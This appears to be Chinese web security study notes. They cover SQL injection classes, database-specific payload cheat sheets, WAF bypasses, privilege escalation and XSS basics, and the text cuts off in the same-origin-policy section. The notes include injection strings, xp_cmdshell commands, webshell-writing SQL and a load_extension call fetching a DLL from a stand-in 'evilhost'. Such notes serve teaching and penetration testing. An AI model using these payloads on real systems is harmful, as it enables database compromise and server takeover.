AA8j
AA8j

【Web安全笔记】之【4.0 常见漏洞攻防】

文章目录

  • 4.0 常见漏洞攻防
    • 4.1 SQL注入
      • 4.1.1 注入分类
        • 1. 简介
        • 2. 按技巧分类
          • 1). 盲注
          • 2). 报错注入
          • 3). 堆叠注入
        • 3. 按获取数据的方式分类
          • 1). inband
          • 2). inference
          • 3). out of band (OOB)
      • 4.1.2 数据库检测
        • 1. MySQL
        • 2. Oracle
        • 3. SQLServer
        • 4. PostgreSQL
      • 4.1.3 注入检测
        • 1. 常见的注入点
        • 2. Fuzz注入点
        • 3. 测试用常量
        • 4. 测试列数
        • 5. 报错注入
        • 6. 基于geometric的报错注入
        • 7. 堆叠注入
        • 8. 注释符
        • 9. 判断过滤规则
      • 4.1.4 绕过技巧
        • 1. 编码绕过
        • 2. 注释
        • 3. 只过滤了一次时
        • 4. 相同功能替换
          • 1). 函数替换
          • 2). 变量替换
          • 3). 符号和关键字
        • 5. HTTP参数
        • 6. 缓冲区溢出
      • 4.1.5 获取信息
        • 1. 判断数据库类型
        • 2. 判断数据库表
        • 3. 版本、主机名、用户名、库名
        • 4. 表和字段
      • 4.1.6 测试权限
        • 1. 文件操作
        • 2. 带外通道
      • 4.1.7 权限提升
        • 1. UDF提权
      • 4.1.8 SQL注入小技巧
        • 1. 宽字节注入
        • 2. CheatSheet
          • 1). SQL Server Payload
            • 常见Payload
            • 报错注入
            • 常用函数
          • 2). MySQL Payload
            • 常见Payload
            • 报错注入常见函数
            • 写文件
          • 3). PostgresSQL Payload
          • 4). Oracle Payload
            • 常见Payload
            • 写文件
          • 5). SQLite3 Payload
      • 4.1.9 预编译
        • 1. 简介
        • 2. 模拟预编译
        • 3. 绕过
          • 1). 预编译使用错误
          • 2). 部分参数不可预编译
          • 3). 预编译实现错误
      • 4.1.10 参考文章
    • 4.2 XSS
      • 4.2.1 分类
        • 1 简介
        • 2. 反射型XSS
        • 3. 储存型XSS
        • 4. DOM XSS
        • 5. Blind XSS
      • 4.2.2 危害
      • 4.2.3 同源策略
        • 1. 简介
        • 2. file域的同源策略
        • 3. cookie的同源策略
        • 4. Flash/SilverLight跨域
        • 5. 源的更改
        • 6. 跨源访问
        • 7. JSONP跨域
        • 8. 跨源脚本API访问
        • 9. 跨源数据存储访问
          • CORS
            • 常见请求头
            • 常见返回头
            • 防御建议
        • 10. 阻止跨源访问
      • 4.2.4 CSP
        • 1. CSP是什么?
        • 2. 配置
        • 3. 指令说明
        • 4. 关键字
        • 5. 配置范例
      • 4.2.5 Bypass
        • 1. 预加载
        • 2. MIME Sniff
        • 3. 302跳转
        • 4. iframe
        • 5. base-uri
        • 6. 其他
      • 4.2.6 XSS数据源
        • 1. URL
        • 2. Navigation
        • 3. Communication
        • 4. Storage
        • 5. Sink
          • 1). 执行JavaScript
          • 2). 加载URL
          • 3). 执行HTML
      • 4.2.7 XSS保护
        • 1. HTML过滤
        • 2. X-Frame
        • 3. XSS保护头
      • 4.2.8 WAF Bypass
      • 4.2.9 技巧
        • 1. httponly
        • 2. CSS 注入
          • 1). 基本介绍
          • 2). CSS selectors
          • 3). Abusing Unicode Range
        • 3. Bypass Via Script Gadgets
          • 1). 简介
          • 2). 例子
        • 4. RPO(Relative Path Overwrite)
      • 4.2.10 Payload
        • 1. 常用
        • 2. 大小写绕过
        • 3. 各种alert
        • 4. 伪协议
        • 5. Chrome XSS auditor bypass
        • 6. 长度限制
        • 7. jquery sourceMappingURL
        • 8. 图片名
        • 9. 过期的payload
        • 10. css
        • 11. markdown
        • 12. iframe
        • 13. form
        • 14. meta
      • 4.2.11 持久化
        • 1. 基于存储
        • 2. Service Worker
        • 3. AppCache
      • 4.2.12 参考链接
        • wiki
        • Challenges
        • CSS
        • 同源策略
        • bypass
        • 持久化
        • Tricks
    • 4.3 CSRF
      • 4.3.1 简介
      • 4.3.2 分类
        • 1. 资源包含
        • 2. 基于表单
        • 3. XMLHttpRequest
      • 4.3.3 防御
      • 4.3.4 参考链接
    • 4.4 SSRF
      • 4.4.1 简介
      • 4.4.2 漏洞危害
      • 4.4.3 利用方式
      • 4.4.4 相关危险函数
      • 4.4.5 过滤绕过
        • 1. 更改IP地址写法
        • 2. 使用解析到内网的域名
        • 3. 利用解析URL所出现的问题
        • 4. 利用跳转
        • 5. 通过各种非HTTP协议
        • 6. DNS Rebinding
        • 7. 利用IPv6
        • 8. 利用IDN
      • 4.4.6 可能的利用点
        • 1. 内网服务
        • 2. Redis利用
        • 3. 云主机
      • 4.4.7 防御方式
      • 4.4.8 参考链接
    • 4.5 命令注入
      • 4.5.1 简介
      • 4.5.2 常见危险函数
        • 1. PHP
        • 2. Python
        • 3. Java
      • 4.5.3 常见注入方式
        • 无回显技巧
      • 4.5.4 常见绕过方式
        • 1. 空格绕过
        • 2. 黑名单绕过
        • 3. 长度限制绕过
      • 4.5.5 常用符号
        • 1. 命令分隔符
        • 2. 通配符
      • 4.5.6 防御
    • 4.6 目录穿越
      • 4.6.1 简介
      • 4.6.2 攻击载荷
        • 1. URL参数
        • 2. Nginx Off by Slash
        • 3. UNC Bypass
      • 4.6.3 过滤绕过
      • 4.6.4 防御
      • 4.6.5 参考链接
    • 4.7 文件读取
    • 4.8 文件上传
      • 4.8.1 文件类型检测绕过
        • 1. 更改请求绕过
        • 2. Magic 检测绕过
        • 3. 后缀绕过
        • 4. 系统命名绕过
        • 5. .user.ini
        • 6. WAF绕过
        • 7. 竞争上传绕过
      • 4.8.2 攻击技巧
        • 1. Apache重写GetShell
        • 2. 软链接任意读文件
      • 4.8.3 防护技巧
      • 4.8.4 参考链接
    • 4.9 文件包含
      • 4.9.1 基础
      • 4.9.2 触发Sink
        • 1. PHP
      • 4.9.3 绕过技巧
        • 1. url编码绕过
        • 2. 特殊字符绕过
        • 3. %00截断
        • 4. 长度截断
        • 5. 伪协议绕过
        • 6. 协议绕过
      • 4.9.4 参考链接
    • 4.10 XXE
      • 4.10.1 XML基础
        • 1. 基本语法
        • 2. XXE
      • 4.10.2 攻击方式
        • 1. 拒绝服务攻击
        • 2. 文件读取
        • 3. SSRF
        • 4. RCE
        • 5. XInclude
      • 4.10.3 参考链接
    • 4.11 模版注入
      • 4.11.1 简介
      • 4.11.2 测试方法
      • 4.11.3 测试用例
      • 4.11.4目标
      • 4.11.5 相关属性
        • 1. `__class__`
        • 2. `__mro__`
        • 3. `__globals__`
        • 4. `__subclasses__()`
      • 4.11.6 常见Payload
      • 4.11.7 绕过技巧
        • 1. 字符串拼接
        • 2. 使用参数绕过
      • 4.11.8 参考链接
    • 4.12 Xpath注入
      • 4.12.1 Xpath 定义
      • 4.11.2 Xpath注入攻击原理
    • 4.13 逻辑漏洞 / 业务漏洞
      • 4.13.1 简介
      • 4.13.2 安装逻辑
      • 4.13.4 交易
          • 1. 购买
          • 2. 业务风控
      • 4.13.5 账户
        • 1. 注册
        • 2. 密码
        • 3. 邮箱用户名
        • 4. Cookie
        • 5. 手机号用户名
        • 6. 登录
        • 7. 找回密码
        • 8. 修改密码
        • 9. 申诉
        • 10. 更新
        • 11. 信息查询
        • 12. 2FA
      • 4.13.5 验证码
      • 4.13.6 Session
      • 4.13.7 越权
      • 4.13.8 随机数安全
      • 4.13.9 其他
      • 4.13.10 参考链接
    • 4.14 配置安全
      • 4.14.1 弱密码
      • 4.14.2 敏感文件泄漏
      • 4.14.3 数据库
      • 4.14.4 加密体系
      • 4.14.5 三方库/软件
    • 4.15 中间件
      • 4.15.1 IIS
        • 1. IIS 6.0
        • 2. IIS 7.0-7.5 / Nginx <= 0.8.37
        • 3. PUT漏洞
        • 4. Windows特性
        • 5. 文件名猜解
        • 6. 参考链接
      • 4.15.2 Apache
        • 1. 后缀解析
        • 2. .htaccess
        • 3. 目录遍历
        • 4. CVE-2017-15715
        • 5. lighttpd
        • 6. 参考链接
      • 4.15.3 Nginx
        • 1. Fast-CGI关闭
        • 2. Fast-CGI开启
        • 3. CVE-2013-4547
        • 4. 配置错误
          • 目录穿越/遍历
        • 5. 参考链接
    • 4.16 Web Cache欺骗攻击
      • 4.16.1 简介
      • 4.16.2 漏洞成因
      • 4.16.3 漏洞利用
      • 4.16.4 漏洞存在的条件
      • 4.16.5 漏洞防御
      • 4.16.6 Web Cache欺骗攻击实例
        • 1. Paypal
      • 4.16.7 参考链接
    • 4.17 HTTP 请求走私
      • 4.17.1 简介
      • 4.17.2 成因
      • 4.17.3 分类
      • 4.17.4 攻击
        • 1. CL不为0的GET请求
        • 2. CL-CL
        • 3. CL-TE
        • 4. TE-CL
        • 5. TE-TE
      • 4.17.5 防御
      • 4.17.6 参考链接
        • 1. RFC
        • 2. Blog / Whitepaper

4.0 常见漏洞攻防

4.1 SQL注入

4.1.1 注入分类

1. 简介

SQL注入是一种代码注入技术,用于攻击数据驱动的应用程序。 在应用程序中,如果没有做恰当的过滤,则可能使得恶意的SQL语句被插入输入字段中执行(例如将数据库内容转储给攻击者)。

2. 按技巧分类

根据使用的技巧,SQL注入类型可分为

1). 盲注
  • 布尔盲注:只能从应用返回中推断语句执行后的布尔值
  • 时间盲注:应用没有明确的回显,只能使用特定的时间函数来判断
2). 报错注入

应用会显示全部或者部分的报错信息

3). 堆叠注入

有的应用可以加入 ; 后一次执行多条语句

3. 按获取数据的方式分类

另外也可以根据获取数据的方式分为3类:

1). inband

利用Web应用来直接获取数据,如报错注入,这类注入都是通过站点的响应或者错误反馈来提取数据。

2). inference

通过Web的一些反映来推断数据,如布尔盲注,也就是我们通俗的盲注, 通过web应用的其他改变来推断数据。

3). out of band (OOB)

通过其他传输方式来获得数据,比如DNS解析协议和电子邮件。

4.1.2 数据库检测

1. MySQL

  • sleep sleep(1)
  • benchmark BENCHMARK(5000000, MD5('test'))
  • 字符串连接
    • SELECT 'a' 'b'
    • SELECT CONCAT('some','string')
  • version
    • SELECT @@version SELECT version()
  • 识别用函数
    • connection_id()
    • last_insert_id()
    • row_count()

2. Oracle

  • 字符串连接
    • 'a'||'oracle' --
    • SELECT CONCAT('some','string')
  • version
    • SELECT banner FROM v$version
    • SELECT banner FROM v$version WHERE rownum=1

3. SQLServer

  • WAITFOR WAITFOR DELAY '00:00:10';
  • SERVERNAME SELECT @@SERVERNAME
  • version SELECT @@version
  • 字符串连接
    • SELECT 'some'+'string'
  • 常量
    • @@pack_received @@rowcount

4. PostgreSQL

  • sleep pg_sleep(1)

4.1.3 注入检测

1. 常见的注入点

  • GET/POST/PUT/DELETE参数
  • X-Forwarded-For
  • 文件名

2. Fuzz注入点

  • ' / "
  • 1/1
  • 1/0
  • and 1=1
  • " and "1"="1
  • and 1=2
  • or 1=1
  • or 1=
  • ' and '1'='1
  • + - ^ * % /
  • << >> || | & &&
  • ~
  • !
  • @
  • 反引号执行

3. 测试用常量

  • @@version
  • @@servername
  • @@language
  • @@spid

4. 测试列数

例如 http://www.foo.com/index.asp?id=12+union+select+null,null-- ,不断增加 null 至不返回

5. 报错注入

  • select 1/0
  • select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a
  • extractvalue(1, concat(0x5c,(select user())))
  • updatexml(0x3a,concat(1,(select user())),1)
  • exp(~(SELECT * from(select user())a))
  • ST_LatFromGeoHash((select * from(select * from(select user())a)b))
  • GTID_SUBSET(version(), 1)

6. 基于geometric的报错注入

  • GeometryCollection((select * from (select * from(select user())a)b))
  • polygon((select * from(select * from(select user())a)b))
  • multipoint((select * from(select * from(select user())a)b))
  • multilinestring((select * from(select * from(select user())a)b))
  • LINESTRING((select * from(select * from(select user())a)b))
  • multipolygon((select * from(select * from(select user())a)b))

其中需要注意的是,基于exp函数的报错注入在MySQL 5.5.49后的版本已经不再生效,具体可以参考这个 commit 95825f 。

而以上列表中基于geometric的报错注入在这个 commit 5caea4 中被修复,在5.5.x较后的版本中同样不再生效

7. 堆叠注入

  • ;select 1

8. 注释符

  • #
  • --+
  • /*xxx*/
  • /*!xxx*/
  • /*!50000xxx*/

9. 判断过滤规则

  • 是否有trunc
  • 是否过滤某个字符
  • 是否过滤关键字
  • slash和编码

4.1.4 绕过技巧

1. 编码绕过

  • 大小写
  • url编码
  • html编码
  • 十六进制编码
  • unicode编码

2. 注释

  • // -- -- + -- - # /**/ ;%00
  • 内联注释用的更多,它有一个特性 /!**/ 只有MySQL能识别
  • e.g. index.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3

3. 只过滤了一次时

  • union => ununionion

4. 相同功能替换

1). 函数替换
  • substring / mid / sub
  • ascii / hex / bin
  • benchmark / sleep
2). 变量替换
  • user() / @@user
3). 符号和关键字
  • and / &
  • or / |

5. HTTP参数

  • HTTP参数污染

    • id=1&id=2&id=3 根据容器不同会有不同的结果

  • HTTP分割注入

6. 缓冲区溢出

  • 一些C语言的WAF处理的字符串长度有限,超出某个长度后的payload可能不会被处理
    • 二次注入有长度限制时,通过多句执行的方法改掉数据库该字段的长度绕过

4.1.5 获取信息

1. 判断数据库类型

  • and exists (select * from msysobjects ) > 0 access数据库

  • and exists (select * from sysobjects ) > 0 SQLServer数据库

2. 判断数据库表

and exsits (select * from admin)

3. 版本、主机名、用户名、库名

4. 表和字段

  • 确定字段数

    • Order By
    • Select Into

  • 表名、列名

4.1.6 测试权限

1. 文件操作

  • 读敏感文件
  • 写shell

2. 带外通道

  • 网络请求

4.1.7 权限提升

1. UDF提权

UDF(User Defined Function,用户自定义函数)是MySQL提供的一个功能,可以通过编写DLL扩展为MySQL添加新函数,扩充其功能。

当获得MySQL权限之后,即可通过这种方式上传自定义的扩展文件,从MySQL中执行系统命令。

4.1.8 SQL注入小技巧

1. 宽字节注入

一般程序员用gbk编码做开发的时候,会用 set names 'gbk' 来设定,这句话等同于

set
character_set_connection = 'gbk',
character_set_result = 'gbk',
character_set_client = 'gbk';

漏洞发生的原因是执行了 set character_set_client = 'gbk'; 之后,mysql就会认为客户端传过来的数据是gbk编码的,从而使用gbk去解码,而mysql_real_escape是在解码前执行的。但是直接用 set names 'gbk' 的话real_escape是不知道设置的数据的编码的,就会加 %5c 。此时server拿到数据解码 就认为提交的字符+%5c是gbk的一个字符,这样就产生漏洞了。

解决的办法有三种,第一种是把client的charset设置为binary,就不会做一次解码的操作。第二种是是 mysql_set_charset('gbk') ,这里就会把编码的信息保存在和数据库的连接里面,就不会出现这个问题了。 第三种就是用pdo。

还有一些其他的编码技巧,比如latin会弃掉无效的unicode,那么admin%32在代码里面不等于admin,在数据库比较会等于admin。

2. CheatSheet

1). SQL Server Payload
常见Payload

  • Version

    SELECT @@version

  • Comment

    • SELECT 1 -- comment
    • SELECT /*comment*/1

  • Space

    0x01 - 0x20

  • 用户信息

    • SELECT user_name()
    • SELECT system_user
    • SELECT user
    • SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

  • 用户权限

    • select IS_SRVROLEMEMBER('sysadmin')
    • select IS_SRVROLEMEMBER('db_owner')

  • List User

    - SELECT name FROM master..syslogins

  • 数据库信息

    • SELECT name FROM master..sysdatabases select quotename(name) from master..sysdatabases FOR XML PATH('')

  • 执行命令

    • EXEC xp_cmdshell 'net user'

  • Ascii

    • SELECT char(0x41)
    • SELECT ascii('A')
    • SELECT char(65)+char(66) => return AB

  • Delay

    • WAITFOR DELAY '0:0:3' pause for 3 seconds

  • Change Password

    • ALTER LOGIN [sa] WITH PASSWORD=N'NewPassword'

  • Trick

    • id=1 union:select password from:user

  • 文件读取

    • OpenRowset

  • 当前查询语句

    • select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)

  • hostname

    • 用于判断是否站库分离
    • select host_name()
报错注入
  • 1=convert(int,(db_name()))
常用函数
  • SUSER_NAME()
  • USER_NAME()
  • PERMISSIONS()
  • DB_NAME()
  • FILE_NAME()
  • TYPE_NAME()
  • COL_NAME()
2). MySQL Payload
常见Payload

  • Version

    SELECT @@version

  • Comment

    • SELECT 1 -- comment
    • SELECT 1 # comment
    • SELECT /*comment*/1

  • Space

    • 0x9
    • 0xa-0xd
    • 0x20 0xa0

  • Current User

    • SELECT user()
    • SELECT system_user()

  • List User

    • SELECT user FROM mysql.user

  • Current Database

    • SELECT database()

  • List Database

    • SELECT schema_name FROM information_schema.schemata

  • List Tables

    • SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

  • List Columns

    • SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

  • If

    • SELECT if(1=1,'foo','bar'); return ‘foo’

  • Ascii

    • SELECT char(0x41)
    • SELECT ascii('A')
    • SELECT 0x414243 => return ABC

  • Delay

    • sleep(1)
    • SELECT BENCHMARK(1000000,MD5('A'))

  • Read File

    • select @@datadir
    • select load_file('databasename/tablename.MYD')

  • Blind

    • ascii(substring(str,pos,length)) & 32 = 1

  • Error Based

    • select count(*),(floor(rand(0)*2))x from information_schema.tables group by x;
    • select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))

  • Change Password

    • mysql -uroot -e "use mysql;UPDATE user SET password=PASSWORD('newpassword') WHERE user='root';FLUSH PRIVILEGES;"
报错注入常见函数
  • extractvalue
  • updatexml
  • GeometryCollection
  • linestring
  • multilinestring
  • multipoint
  • multipolygon
  • polygon
  • exp
写文件

写文件前提

  • root 权限
  • 知晓文件绝对路径
  • 写入的路径存在写入权限
  • secure_file_priv 允许向对应位置写入
  • select count(file_priv) from mysql.user

基于 into 写文件

union select 1,1,1 into outfile '/tmp/demo.txt'
union select 1,1,1 into dumpfile '/tmp/demo.txt'

dumpfile和outfile不同在于,outfile会在行末端写入新行,会转义换行符,如果写入二进制文件,很可能被这种特性破坏

基于 log 写文件

show variables like '%general%';
set global general_log = on;
set global general_log_file = '/path/to/file';
select '';
set global general_log_file = '/original/path';
set global general_log = off;
3). PostgresSQL Payload
  • Version
    • SELECT version()
  • Comment
    • SELECT 1 -- comment
    • SELECT /*comment*/1
  • Current User
    • SELECT user
    • SELECT current_user
    • SELECT session_user
    • SELECT getpgusername()
  • List User
    • SELECT usename FROM pg_user
  • Current Database
    • SELECT current_database()
  • List Database
    • SELECT datname FROM pg_database
  • Ascii
    • SELECT char(0x41) SELECT ascii('A')
  • Delay
    • pg_sleep(1)
4). Oracle Payload
常见Payload
  • dump
    • select * from v$tablespace;
    • select * from user_tables;
    • select column_name from user_tab_columns where table_name = 'table_name';
    • select column_name, data_type from user_tab_columns where table_name = 'table_name';
    • SELECT * FROM ALL_TABLES
  • Comment
    • --
    • /**/
  • Space
    • 0x00
    • 0x09
    • 0xa-0xd
    • 0x20
  • 报错
    • utl_inaddr.get_host_name
    • ctxsys.drithsx.sn
    • ctxsys.CTX_REPORT.TOKEN_TYPE
    • XMLType
    • dbms_xdb_version.checkin
    • dbms_xdb_version.makeversioned
    • dbms_xdb_version.uncheckout
    • dbms_utility.sqlid_to_sqlhash
    • ordsys.ord_dicom.getmappingxpath
    • utl_inaddr.get_host_name
    • utl_inaddr.get_host_address
  • OOB
    • utl_http.request
    • utl_inaddr.get_host_address
    • SYS.DBMS_LDAP.INIT
    • HTTPURITYPE
    • HTTP_URITYPE.GETCLOB
  • 绕过
    • rawtohex
写文件
create or replace directory TEST_DIR as '/path/to/dir';
grant read, write on directory TEST_DIR to system;
declare
   isto_file utl_file.file_type;
begin
   isto_file := utl_file.fopen('TEST_DIR', 'test.jsp', 'W');
   utl_file.put_line(isto_file, '<% out.println("test"); %>');
   utl_file.fflush(isto_file);
   utl_file.fclose(isto_file);
end;
5). SQLite3 Payload
  • Comment
    • --
    • /**/
  • Version
    • select sqlite_version();

Command Execution

ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ('');--

Load_extension

UNION SELECT 1,load_extension('\\evilhost\evil.dll','E');--

4.1.9 预编译

1. 简介

SQL注入是因为解释器将传入的数据当成命令执行而导致的,预编译是用于解决这个问题的一种方法。和普通的执行流程不同,预编译将一次查询通过两次交互完成,第一次交互发送查询语句的模板,由后端的SQL引擎进行解析为AST或Opcode,第二次交互发送数据,代入AST或Opcode中执行。因为此时语法解析已经完成,所以不会再出现混淆数据和代码的过程。

2. 模拟预编译

为了防止低版本数据库不支持预编译的情况,模拟预编译会在客户端内部模拟参数绑定的过程,进行自定义的转义。

3. 绕过

1). 预编译使用错误

预编译只是使用占位符替代的字段值的部分,如果第一次交互传入的命令使用了字符串拼接,使得命令是攻击者可控的,那么预编译不会生效。

2). 部分参数不可预编译

在有的情况下,数据库处理引擎会检查数据表和数据列是否存在,因此数据表名和列名不能被占位符所替代。这种情况下如果表名和列名可控,则可能引入漏洞。

3). 预编译实现错误

部分语言引擎在实现上存在一定问题,可能会存在绕过漏洞。

4.1.10 参考文章

  • NoSQL注入的分析和缓解
  • NoSQL注入
  • SQL注入ByPass的一些小技巧
  • sqlmap time based inject 分析
  • SQLInjectionWiki
  • Waf Bypass之道
  • MySQL Bypass Wiki
  • 常见数据库写入Webshell汇总

4.2 XSS

4.2.1 分类

1 简介

XSS全称为Cross Site Scripting,为了和CSS分开简写为XSS,中文名为跨站脚本。该漏洞发生在用户端,是指在渲染过程中发生了不在预期过程中的JavaScript代码执行。XSS通常被用于获取Cookie、以受攻击者的身份进行操作等行为。

2. 反射型XSS

反射型XSS是比较常见和广泛的一类,举例来说,当一个网站的代码中包含类似下面的语句:hello, $_GET['user']";?> ,那么在访问时设置 /?user=alert("hack") ,则可执行预设好的JavaScript代码。

反射型XSS通常出现在搜索等功能中,需要被攻击者点击对应的链接才能触发,且受到XSS Auditor、NoScript等防御手段的影响较大。

3. 储存型XSS

储存型XSS相比反射型来说危害较大,在这种漏洞中,攻击者能够把攻击载荷存入服务器的数据库中,造成持久化的攻击

4. DOM XSS

DOM型XSS不同之处在于DOM型XSS一般和服务器的解析响应没有直接关系,而是在JavaScript脚本动态执行的过程中产生的

例如

<html>
<head>
<title>DOM Based XSS Demotitle>
<script>
function xsstest()
{
    var str = document.getElementById("input").value;
    document.getElementById("output").innerHTML = "";
}
script>
head>
<body>
<div id="output">div>
<input type="text" id="input" size=50 value="" />
<input type="button" value="submit" onclick="xsstest()" />
body>
html>

输入 x' onerror='javascript:alert(/xss/) 即可触发。

5. Blind XSS

Blind XSS是储存型XSS的一种,它保存在某些存储中,当一个“受害者”访问这个页面时执行,并且在文档对象模型(DOM)中呈现payload。 它被称为Blind的原因是因为它通常发生在通常不暴露给用户的功能上

4.2.2 危害

存在XSS漏洞时,可能会导致以下几种情况:

  1. 用户的Cookie被获取,其中可能存在Session ID等敏感信息。若服务器端没有做相应防护,攻击者可用对应Cookie登陆服务器。
  2. 攻击者能够在一定限度内记录用户的键盘输入
  3. 攻击者通过CSRF等方式以用户身份执行危险操作
  4. XSS蠕虫
  5. 获取用户浏览器信息
  6. 利用XSS漏洞扫描用户内网

4.2.3 同源策略

1. 简介

同源策略限制了不同源之间如何进行资源交互,是用于隔离潜在恶意文件的重要安全机制。 是否同源由URL决定,URL由协议、域名、端口和路径组成,如果两个URL的协议、域名和端口相同,则表示他们同源

2. file域的同源策略

在之前的浏览器中,任意两个file域的URI被认为是同源的。本地磁盘上的任何HTML文件都可以读取本地磁盘上的任何其他文件。

从Gecko 1.9开始,文件使用了更细致的同源策略,只有当源文件的父目录是目标文件的祖先目录时,文件才能读取另一个文件

3. cookie的同源策略

cookie使用不同的源定义方式,一个页面可以为本域和任何父域设置cookie,只要是父域不是公共后缀(public suffix)即可

不管使用哪个协议(HTTP/HTTPS)或端口号,浏览器都允许给定的域以及其任何子域名访问cookie。设置 cookie时,可以使用 domain / path / securehttp-only 标记来限定其访问性。

所以 https://localhost:8080/http://localhost:8081/ 的Cookie是共享的。

4. Flash/SilverLight跨域

浏览器的各种插件也存在跨域需求。通常是通过在服务器配置crossdomain.xml,设置本服务允许哪些域名的跨域访问。

客户端会请求此文件,如果发现自己的域名在访问列表里,就发起真正的请求,否则不发送请求。

5. 源的更改

同源策略认为域和子域属于不同的域,例如 child1.a.coma.com / child1.a.comchild2.a.com / xxx.child1.a.comchild1.a.com 两两不同源。

对于这种情况,可以在两个方面各自设置 document.domain='a.com' 来改变其源来实现以上任意两个页面之间的通信。

另外因为浏览器单独保存端口号,这种赋值会导致端口号被重写为 null

6. 跨源访问

同源策略控制了不同源之间的交互,这些交互通常分为三类:

  • 通常允许跨域写操作(Cross-origin writes)
    • 链接(links)
    • 重定向
    • 表单提交
  • 通常允许跨域资源嵌入(Cross-origin embedding)
  • 通常不允许跨域读操作(Cross-origin reads)

可能嵌入跨源的资源的一些示例有:

  • 标签嵌入跨域脚本。语法错误信息只能在同源脚本中捕捉到。
  • 标签嵌入CSS。由于CSS的松散的语法规则,CSS的跨域需要一个设置正确的Content-Type 消息头。
  • / / 嵌入多媒体资源。
  • embedapplet 的插件。
  • @font-face 引入的字体。一些浏览器允许跨域字体( cross-origin fonts),一些需要同源字体(same-origin fonts)。
  • frameiframe 载入的任何资源。站点可以使用X-Frame-Options消息头来阻止这种形式的跨域交互。

    • 7. JSONP跨域

    JSONP就是利用

    你可能感兴趣的:(Web安全笔记)

    • 10月|愿你的青春不负梦想-读书笔记-01 Tracy的小书斋
      本书的作者是俞敏洪,大家都很熟悉他了吧。俞敏洪老师是我行业的领头羊吧,也是我事业上的偶像。本日摘录他书中第一章中的金句:『一个人如果什么目标都没有,就会浑浑噩噩,感觉生命中缺少能量。能给我们能量的,是对未来的期待。第一件事,我始终为了进步而努力。与其追寻全世界的骏马,不如种植丰美的草原,到时骏马自然会来。第二件事,我始终有阶段性的目标。什么东西能给我能量?答案是对未来的期待。』读到这里的时候,我便
    • 《投行人生》读书笔记 小蘑菇的树洞
      《投行人生》----作者詹姆斯-A-朗德摩根斯坦利副主席40年的职业洞见-很短小精悍的篇幅,比较适合初入职场的新人。第一部分成功的职业生涯需要规划1.情商归为适应能力分享与协作同理心适应能力,更多的是自我意识,你有能力识别自己的情并分辨这些情绪如何影响你的思想和行为。2.对于初入职场的人的建议,细节,截止日期和数据很重要截止日期,一种有效的方法是请老板为你所有的任务进行优先级排序。和老板喝咖啡的好
    • 【一起学Rust | 设计模式】习惯语法——使用借用类型作为参数、格式化拼接字符串、构造函数 广龙宇 一起学Rust#Rust设计模式rust设计模式开发语言
      提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、使用借用类型作为参数二、格式化拼接字符串三、使用构造函数总结前言Rust不是传统的面向对象编程语言,它的所有特性,使其独一无二。因此,学习特定于Rust的设计模式是必要的。本系列文章为作者学习《Rust设计模式》的学习笔记以及自己的见解。因此,本系列文章的结构也与此书的结构相同(后续可能会调成结构),基本上分为三个部分
    • git常用命令笔记 咩酱-小羊 git笔记
      ###用习惯了idea总是不记得git的一些常见命令,需要用到的时候总是担心旁边站了人~~~记个笔记@_@,告诉自己看笔记不丢人初始化初始化一个新的Git仓库gitinit配置配置用户信息gitconfig--globaluser.name"YourName"gitconfig--globaluser.email"[email protected]"基本操作克隆远程仓库gitclone查看
    • 509. 斐波那契数(每日一题) lzyprime
      lzyprime博客(github)创建时间:2021.01.04qq及邮箱:2383518170leetcode笔记题目描述斐波那契数,通常用F(n)表示,形成的序列称为斐波那契数列。该数列由0和1开始,后面的每一项数字都是前面两项数字的和。也就是:F(0)=0,F(1)=1F(n)=F(n-1)+F(n-2),其中n>1给你n,请计算F(n)。示例1:输入:2输出:1解释:F(2)=F(1)+
    • 拥有断舍离的心态,过精简生活--《断舍离》读书笔记 爱吃丸子的小樱桃
      不知不觉间房间里的东西越来越多,虽然摆放整齐,但也时常会觉得空间逼仄,令人心生烦闷。抱着断舍离的态度,我开始阅读《断舍离》这本书,希望从书中能找到一些有效的方法,帮助我实现空间、物品上的断舍离。《断舍离》是日本作家山下英子通过自己的经历、思考和实践总结而成的,整体内涵也从刚开始的私人生活哲学的“断舍离”升华成了“人生实践哲学”,接着又成为每个人都能实行的“改变人生的断舍离”,从“哲学”逐渐升华成“
    • 四章-32-点要素的聚合 彩云飘过
      本文基于腾讯课堂老胡的课《跟我学Openlayers--基础实例详解》做的学习笔记,使用的openlayers5.3.xapi。源码见1032.html,对应的官网示例https://openlayers.org/en/latest/examples/cluster.htmlhttps://openlayers.org/en/latest/examples/earthquake-clusters.
    • 高端密码学院笔记285 柚子_b4b4
      高端幸福密码学院(高级班)幸福使者:李华第(598)期《幸福》之回归内在深层生命原动力基础篇——揭秘“激励”成长的喜悦心理案例分析主讲:刘莉一,知识扩充:成功=艰苦劳动+正确方法+少说空话。贪图省力的船夫,目标永远下游。智者的梦再美,也不如愚人实干的脚印。幸福早课堂2020.10.16星期五一笔记:1,重视和珍惜的前提是知道它的价值非常重要,当你珍惜了,你就真正定下来,真正的学到身上。2,大家需要
    • Day17笔记-高阶函数 ~在杰难逃~ Python笔记python开发语言pycharm数据分析
      高阶函数【重点掌握】函数的本质:函数是一个变量,函数名是一个变量名,一个函数可以作为另一个函数的参数或返回值使用如果A函数作为B函数的参数,B函数调用完成之后,会得到一个结果,则B函数被称为高阶函数常用的高阶函数:map(),reduce(),filter(),sorted()1.map()map(func,iterable),返回值是一个iterator【容器,迭代器】func:函数iterab
    • Day1笔记-Python简介&标识符和关键字&输入输出 ~在杰难逃~ Pythonpython开发语言大数据数据分析数据挖掘
      大家好,从今天开始呢,杰哥开展一个新的专栏,当然,数据分析部分也会不定时更新的,这个新的专栏主要是讲解一些Python的基础语法和知识,帮助0基础的小伙伴入门和学习Python,感兴趣的小伙伴可以开始认真学习啦!一、Python简介【了解】1.计算机工作原理编程语言就是用来定义计算机程序的形式语言。我们通过编程语言来编写程序代码,再通过语言处理程序执行向计算机发送指令,让计算机完成对应的工作,编程
